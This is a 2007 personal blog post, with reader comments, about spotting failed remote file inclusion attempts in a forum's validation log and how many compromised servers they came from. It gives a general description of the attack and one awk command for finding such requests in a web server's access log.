Dave's Mess > Blog

<<< Security implications of data recovery Little Bobby Tables >>>

So many servers, all hacked.

11am, 13th October 2007 - Geek, Interesting, Web, Security, Developer

Yesterday, while trying to track down a problem with one of our forums, I was looking through the validation log and spotted something rather unusual.

The validation log stores all the parameters passed to the forums that failed validation so that we can verify that no legitimate users are being denied access. Parameters include things like which post you are looking at, which thread it's in, which board the thread's in and which page of the thread you are on. Normally, the post number, thread number and page number are all actually numbers but occasionally, somebody thinks it might be a good idea to put something else, like a URL, into the post number parameter.

The result was astounding.
I sat there for minutes, watching the URLs of compromised servers fly past on my screen.
In this case, it was a misguided hacking attempt aimed at a completely different piece of software than the one we are running. We didn't have the vulnerability he was trying to exploit. Had it been aimed at the correct software and succeeded, it would have would have changed the parameter so that instead of including a PHP file from the webserver, it would have included a file from someone else's webserver and run that file just as it does when the file is local. The difference is that the code from the other webserver would have installed a rootkit, a command and control interface, a couple of new users and finally sent a message back to it's owner telling him where we were.

Unfortunately, people who try to seize control of other people's webservers are a paranoid lot. They don't usually just start hacking from their home computer and head straight for the target. They will use Tor or an anonymous proxy to mask their true identities. They'll use webservers that they have already cracked to help crack new webservers. In this case, tracing the hacking attempt back to where it came from only lead us to another compromised server with a web-based command and control page and the file required to hack other servers.

I didn't pursue it any further for several reasons: I'm not paid to hunt down crackers, it would have been illegal for me to use the compromised server to find out where it had been compromised from and it was an unsuccessful attempt to exploit a vulnerability we didn't even have. Out of interest, I did quickly grep through the entire set of validation logs just to see how many of these attempts there were and from how many already-compromised webservers. The result was astounding. I sat there for minutes, watching the URLs of compromised servers fly past on my screen.

I wasn't all that surprised to see lots of hacking attempts. Just put a machine on the internet running Snort for a day and you'll understand why. What did surprise me was the sheer number of already compromised servers sitting out there. Do people not have intrusion detection systems ? Do they not check their log files ? Has somebody like me not already noticed that their server has been hacked and emailed to let them know ? (For the record, I did email the admin of the first server but once I found the hundreds or thousands in the log files I decided that it was a bit much effort for me...)

Does security not matter to these people ?

I suspect that's the answer. Most people are on the net to create something. They aren't interested in learning all about computer security and how to secure their machines. They just want to create their own little corner of the web where they can do as they please.

Related posts:

MoneySavingExpert under DDoS attack
Swedish security researcher exposes plaintext passwords found while sniffing Tor
Sendgrid pricing plans explained
Distribution and layers
Clever girl...

Comments


On Mon 5th Nov 2007 at 5pm Filipe Freitas said:

I think you're referring to remote code injection attacks. I also have those on my server, but they don't work (i hope). I ban their IPs and sit back and enjoy watching their requests being splattered like flies.
On Mon 5th Nov 2007 at 10pm Dave said:

You're absolutely correct. It might have been more obvious if I had posted some examples but there are several reasons that I didn't.

If I had posted the URLs that the attackers are trying to include in my PHP scripts, I would be exposing the poor guy whose server has already been hacked. If I post an example script to my own site, attackers will try to use my site as part of their attack... or just learn by copying whatever I put up.

On the other hand, letting webmasters know what to look for may do much more to help security than avoiding giving hackers their tools. I'll post some actual examples here once the compromised servers have been cleaned up.
On Mon 12th Nov 2007 at 10am Bart said:

Small note: protect your form ;)

You can simply click on Submit without entering any data.
On Mon 12th Nov 2007 at 8pm Dave said:

Heh. True.

There are far too many TODO items in my code. Once I've finished the security side of things I sometimes forget about the "features".
On Thu 3rd Apr 2008 at 4pm toby said:

Dave,

Can you tell me how to check the log for those attempts? I really hope to learn how to check the log using my telnet tool.

toby
On Sat 10th May 2008 at 4pm Dave said:

If you have shell access on your webserver (whether that be by telnet, ssh or in person with a keyboard) you can find these sorts of entries on your log files with the following command: awk '$7 ~ /http/ {print $7}' /var/log/httpd/access_log You will need to replace "/var/log/httpd/access_log" with the location of your log file.
On Thu 22nd May 2008 at 12pm Melanie said:

Hi Dave

I was going through my log files and found the same type of links you referred to in an earlier post - cmd.txt files - I'm a little confused though - you mentioned in your article about compromised servers, I dont fully understand how everything fits together and how I can check that my site is completely secure. If you get some time, would you be able to email me and explain. I'd really appreciate it very much.

Rgds
Melanie


On Sun 22nd Jun 2008 at 12pm Canober Blog said:

Some people just want to be a part of the web but they won't have any idea about security and server protection. In my blogs I use wordpress but on the main page its always a CMS written by me because I check and recheck for any vulnerabilities and then upload the script.
On Mon 10th Nov 2008 at 1pm jefferysuky said:

for just hacking only
On Wed 28th Sep 2011 at 4pm Dave said:

That's an odd thing to say. Any chance you could elaborate a little ?


(not shown publicly)


Limited HTML
Like BBCode
Common Usage
What's all this ?



Older blog posts: